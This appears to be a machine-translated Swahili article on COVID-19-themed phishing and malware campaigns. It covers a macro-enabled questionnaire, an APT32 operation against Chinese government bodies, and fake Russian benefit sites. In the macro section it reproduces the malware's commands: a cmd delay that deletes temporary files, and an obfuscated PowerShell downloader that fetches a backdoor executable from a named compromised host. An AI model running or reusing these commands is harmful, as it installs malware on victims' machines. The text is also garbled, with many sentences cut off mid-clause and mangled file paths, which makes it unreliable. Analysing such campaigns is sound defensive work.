Wavamizi wanaendelea kutumia mada ya COVID-19, na hivyo kusababisha vitisho zaidi na zaidi kwa watumiaji ambao wanavutiwa sana na kila kitu kinachohusiana na janga hili. KATIKA
Kumbuka katika
Je, ungependa kupima COVID-19 bila malipo?
Mfano mwingine muhimu wa ulaghai unaozingatia virusi vya corona ulikuwa
Kushawishi watumiaji wengi kuwezesha macros pia ilikuwa rahisi. Ili kufanya hivyo, hila ya kawaida ilitumiwa: kujaza dodoso, kwanza unahitaji kuwezesha macros, ambayo ina maana unahitaji kuendesha hati ya VBA.
Kama unaweza kuona, hati ya VBA imefunikwa haswa kutoka kwa antivirus.
Windows ina kipengele cha kusubiri ambapo programu husubiri /T <seconds> kabla ya kukubali jibu chaguo-msingi la "Ndiyo". Kwa upande wetu, hati ilisubiri sekunde 65 kabla ya kufuta faili za muda:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Na wakati wa kusubiri, programu hasidi ilipakuliwa. Hati maalum ya PowerShell ilizinduliwa kwa hili:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Baada ya kusimbua thamani ya Base64, hati ya PowerShell inapakua mlango wa nyuma ulio kwenye seva ya wavuti iliyodukuliwa hapo awali kutoka Ujerumani:
http://automatischer-staubsauger.com/feature/777777.png
na kuihifadhi chini ya jina:
C:UsersPublictmpdirfile1.exe
Folder ‘C:UsersPublictmpdir’
inafutwa wakati wa kuendesha faili ya 'tmps1.bat' iliyo na amri cmd /c mkdir ""C:UsersPublictmpdir"".
Shambulio lililolengwa kwa mashirika ya serikali
Kwa kuongezea, wachambuzi wa FireEye hivi karibuni waliripoti shambulio lililolengwa la APT32 lililolenga miundo ya serikali huko Wuhan, na vile vile Wizara ya Usimamizi wa Dharura ya Uchina. Mojawapo ya RTF zilizosambazwa ilikuwa na kiungo cha makala ya New York Times yenye kichwa
Inafurahisha, wakati wa kugundua, hakuna antivirusi iliyogundua tukio hili, kulingana na Virustotal.
Wakati tovuti rasmi ziko chini
Mfano wa kuvutia zaidi wa shambulio la hadaa lilitokea nchini Urusi siku moja tu. Sababu ya hii ilikuwa uteuzi wa faida iliyosubiriwa kwa muda mrefu kwa watoto wenye umri wa miaka 3 hadi 16. Mwanzo wa kukubali maombi ulipotangazwa Mei 12, 2020, mamilioni ya watu walikimbilia tovuti ya Huduma za Serikali kwa usaidizi uliosubiriwa kwa muda mrefu na kuleta tovuti mbaya zaidi kuliko shambulio la kitaalamu la DDoS. Rais aliposema kwamba “Huduma za Serikali hazingeweza kukabiliana na mtiririko wa maombi,” watu walianza kuzungumza mtandaoni kuhusu kuzinduliwa kwa tovuti mbadala ya kupokea maombi.
Shida ni kwamba tovuti kadhaa zilianza kufanya kazi mara moja, na wakati moja, ile halisi kwenye posobie16.gosuslugi.ru, inakubali maombi, zaidi.
Wenzake kutoka SearchInform walipata takriban vikoa 30 vipya vya ulaghai katika eneo la .ru. Infosecurity na Kampuni ya Softline imefuatilia zaidi ya tovuti 70 sawa za huduma za serikali ghushi tangu mwanzoni mwa Aprili. Waundaji wao hudanganya alama zinazojulikana na pia hutumia michanganyiko ya maneno gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, na kadhalika.
Hype na uhandisi wa kijamii
Mifano hii yote inathibitisha tu kwamba wavamizi wanachuma mapato kwa mada ya coronavirus. Na kadiri mvutano wa kijamii unavyoongezeka na jinsi masuala yasiyoeleweka zaidi, ndivyo walaghai wanavyokuwa na nafasi nyingi zaidi za kuiba data muhimu, kuwalazimisha watu kutoa pesa zao wenyewe, au kudukua kompyuta nyingi zaidi.
Na kwa kuzingatia kwamba janga hili limelazimisha watu ambao hawajajiandaa kufanya kazi kutoka nyumbani kwa wingi, sio tu ya kibinafsi, lakini pia data ya kampuni iko hatarini. Kwa mfano, hivi majuzi watumiaji wa Microsoft 365 (zamani Office 365) pia walikumbwa na shambulio la hadaa. Watu walipokea ujumbe mkubwa wa sauti "waliokosa" kama viambatisho kwa barua. Walakini, faili hizo zilikuwa ukurasa wa HTML ambao ulituma wahasiriwa wa shambulio hilo
Chanzo: mapenzi.com